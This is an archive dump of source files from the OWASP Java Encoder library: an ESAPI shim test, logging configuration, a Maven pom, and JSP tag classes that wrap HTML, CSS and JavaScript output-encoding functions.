(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.owasp-java-encoder-1.2.3/esapi/src/site/000077500000000000000000000000001375203724500200465ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/site/site.xml000066400000000000000000000031421375203724500215340ustar00rootroot00000000000000 owasp-java-encoder-1.2.3/esapi/src/test/000077500000000000000000000000001375203724500200615ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/test/java/000077500000000000000000000000001375203724500210025ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/test/java/org/000077500000000000000000000000001375203724500215715ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/test/java/org/owasp/000077500000000000000000000000001375203724500227225ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/test/java/org/owasp/encoder/000077500000000000000000000000001375203724500243415ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/test/java/org/owasp/encoder/esapi/000077500000000000000000000000001375203724500254425ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java000066400000000000000000000027451375203724500313160ustar00rootroot00000000000000package org.owasp.encoder.esapi; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import junit.framework.Test; import junit.framework.TestCase; import junit.framework.TestSuite; import org.owasp.esapi.ESAPI; import org.owasp.esapi.Encoder; /** * ESAPIEncoderTest * * @author jeffi */ public class ESAPIEncoderTest extends TestCase { public static Test suite() { return new TestSuite(ESAPIEncoderTest.class); } public void testEncode() throws Exception { // Note: ESAPI reference encodes as: "<>&Ω" // That's 25 characters to OWASP Java Encoder's 14. assertEquals("<>&\u03a9", ESAPI.encoder().encodeForXML("<>&\u03a9")); } public void testSerialization() throws Exception { // Note: ESAPI reference implementation is NOT serializable. Maybe // it will be in the future. Our implementation is however // guaranteed serializable. Encoder encoder = ESAPI.encoder(); ByteArrayOutputStream baos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(baos); oos.writeObject(encoder); oos.close(); ObjectInputStream ois = new ObjectInputStream( new ByteArrayInputStream(baos.toByteArray())); Encoder deserializedEncoder = (Encoder)ois.readObject(); assertSame(encoder, deserializedEncoder); } } owasp-java-encoder-1.2.3/esapi/src/test/resources/000077500000000000000000000000001375203724500220735ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/test/resources/.esapi/000077500000000000000000000000001375203724500232525ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/test/resources/.esapi/ESAPI.properties000066400000000000000000000041771375203724500262420ustar00rootroot00000000000000# Properties based on ESAPI 2.2.1.1's configuration/esapi/ESAPI.properties file. ESAPI.Encoder=org.owasp.encoder.esapi.ESAPIEncoder # Log4JFactory Requires log4j.xml or log4j.properties in classpath - http://www.laliluna.de/log4j-tutorial.html # Note that this is now considered deprecated! #ESAPI.Logger=org.owasp.esapi.logging.log4j.Log4JLogFactory # To use JUL, you need to obtain ESAPI's esapi-java-logging.properties and drop # it somewhere into your class path. You can get it from the ESAPI configuration # jar. (See Release 2.2.1.1 under GitHub for ESAPI/esapi-java-legacy.) ESAPI.Logger=org.owasp.esapi.logging.java.JavaLogFactory # To use the new SLF4J logger in ESAPI (see GitHub issue #129), set #ESAPI.Logger=org.owasp.esapi.logging.slf4j.Slf4JLogFactory # and do whatever other normal SLF4J configuration that you normally would do for your application. # Note: The uncommented out ones are those needed for SLF4J. Others may be # needed if you change the ESAPI logger. #=========================================================================== # ESAPI Logging # Set the application name if these logs are combined with other applications Logger.ApplicationName=ESAPI-Shim-Test # If you use an HTML log viewer that does not properly HTML escape log data, you can set LogEncodingRequired to true Logger.LogEncodingRequired=false # Determines whether ESAPI should log the application name. This might be clutter in some single-server/single-app environments. Logger.LogApplicationName=true # Determines whether ESAPI should log the server IP and port. This might be clutter in some single-server environments. Logger.LogServerIP=false # LogFileName, the name of the logging file. Provide a full directory path (e.g., C:\\ESAPI\\ESAPI_logging_file) if you # want to place it in a specific directory. #Logger.LogFileName=ESAPI_logging_file # MaxLogFileSize, the max size (in bytes) of a single log file before it cuts over to a new one (default is 10,000,000) #Logger.MaxLogFileSize=10000000 # Determines whether ESAPI should log the user info. Logger.UserInfo=false # Determines whether ESAPI should log the session id and client IP Logger.ClientInfo=false owasp-java-encoder-1.2.3/esapi/src/test/resources/esapi-java-logging.properties000066400000000000000000000005331375203724500276560ustar00rootroot00000000000000handlers= java.util.logging.ConsoleHandler .level= INFO java.util.logging.ConsoleHandler.level = INFO java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter java.util.logging.SimpleFormatter.format=[%1$tF %1$tT] [%3$-7s] %5$s %n #https://www.logicbig.com/tutorials/core-java-tutorial/logging/customizing-default-format.htmlowasp-java-encoder-1.2.3/jsp/000077500000000000000000000000001375203724500160065ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/pom.xml000066400000000000000000000066721375203724500173360ustar00rootroot00000000000000 4.0.0 org.owasp.encoder encoder-parent 1.2.3 encoder-jsp jar JSP Encoder The OWASP Encoder JSP package contains JSP tag definitions and TLDs to allow easy use of the OWASP Encoder Project's core API. The TLDs contain both tag definitions and JSP EL functions. org.owasp.encoder encoder ${project.parent.version} javax.servlet.jsp javax.servlet.jsp-api 2.2.1 provided javax.servlet javax.servlet-api 3.0.1 test org.springframework spring-test 5.1.3.RELEASE test org.springframework spring-core 5.1.3.RELEASE test owasp-java-encoder-1.2.3/jsp/src/000077500000000000000000000000001375203724500165755ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/main/000077500000000000000000000000001375203724500175215ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/main/java/000077500000000000000000000000001375203724500204425ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/main/java/org/000077500000000000000000000000001375203724500212315ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/000077500000000000000000000000001375203724500223625ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/000077500000000000000000000000001375203724500240015ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/000077500000000000000000000000001375203724500245545ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java000066400000000000000000000042131375203724500276010ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import javax.servlet.jsp.tagext.SimpleTagSupport; /** * The base class for the encoding tags within tihs package. * * @author Jeremy Long (jeremy.long@gmail.com) */ public abstract class EncodingTag extends SimpleTagSupport { /** * The value to be written out by the tag. */ protected String _value; /** * Sets the value to be written out by the tag. * @param value the value to be written out by the tag. */ public void setValue(String value) { this._value = value; } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java000066400000000000000000000041471375203724500273440ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform encoding sufficient to place into a CDATA block. * This wraps the {@link org.owasp.encoder.Encode#forCDATA(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForCDATATag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forCDATA(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java000066400000000000000000000041401375203724500304400ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform CSS encoding for CSS strings. * This wraps the {@link org.owasp.encoder.Encode#forCssString(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForCssStringTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forCssString(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java000066400000000000000000000041341375203724500277370ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform CSS encoding for CSS URL contexts. * This wraps the {@link org.owasp.encoder.Encode#forCssUrl(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForCssUrlTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forCssUrl(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java000066400000000000000000000041661375203724500313210ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform HTML encoding for HTML text attributes. * This wraps the {@link org.owasp.encoder.Encode#forHtmlAttribute(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlAttributeTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forHtmlAttribute(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java000066400000000000000000000041501375203724500307610ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform HTML encoding for text content. * This wraps the {@link org.owasp.encoder.Encode#forHtmlContent(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlContentTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forHtmlContent(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java000066400000000000000000000041021375203724500274230ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform HTML encoding. * This wraps the {@link org.owasp.encoder.Encode#forHtml(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forHtml(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java000066400000000000000000000042311375203724500330370ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform HTML Attribute encoding for an unquoted attribute. * This wraps the {@link org.owasp.encoder.Encode#forHtmlUnquotedAttribute(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlUnquotedAttributeTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forHtmlUnquotedAttribute(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java000066400000000000000000000041771375203724500324650ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform JavaScript Attribute encoding. * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptAttribute(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptAttributeTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forJavaScriptAttribute(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java000066400000000000000000000041571375203724500315520ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform JavaScript Block encoding. * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptBlock(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptBlockTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forJavaScriptBlock(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java000066400000000000000000000041631375203724500317550ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform JavaScript Source encoding. * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptSource(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptSourceTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forJavaScriptSource(getJspContext().getOut(), _value); } } 